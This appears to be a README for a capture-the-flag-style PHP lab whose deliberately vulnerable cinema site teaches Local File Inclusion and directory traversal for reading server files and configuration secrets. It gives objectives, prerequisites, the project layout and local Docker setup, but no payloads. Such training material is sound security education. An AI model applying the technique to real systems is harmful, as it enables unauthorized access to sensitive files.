Learn to identify and exploit Local File Inclusion vulnerabilities in PHP web applications to access sensitive configuration files and extract critical information.
This lab demonstrates a vulnerable independent cinema platform called Cinematika. The application contains a page routing system that is vulnerable to Local File Inclusion (LFI) through improper input sanitization, allowing attackers to read arbitrary files from the server filesystem.
- Identify a Local File Inclusion vulnerability
- Exploit directory traversal to access system files
- Extract sensitive configuration data from PHP source files
- Understand the impact of insecure file inclusion
Intermediate
30-45 minutes
- Basic understanding of web application security
- Knowledge of directory traversal techniques
- Familiarity with PHP file inclusion
- Understanding of HTTP requests and responses
├── deploy/ # Docker configuration and application files
│ ├── index.php # Main application entry point (vulnerable)
│ ├── config.php # Configuration file containing sensitive data
│ └── templates/ # HTML templates
├── test/ # Automated vulnerability tests
├── docs/ # Documentation
├── README.md # This file
└── .gitignore
Docker and Docker Compose installed locally.
- Clone the repository
- Navigate to the project directory
- Run the application:
cd deploy docker-compose up --build -d - Visit http://localhost:3206 and start testing the page parameter
Report issues at: https://github.com/ctf-labs/php-lfi/issues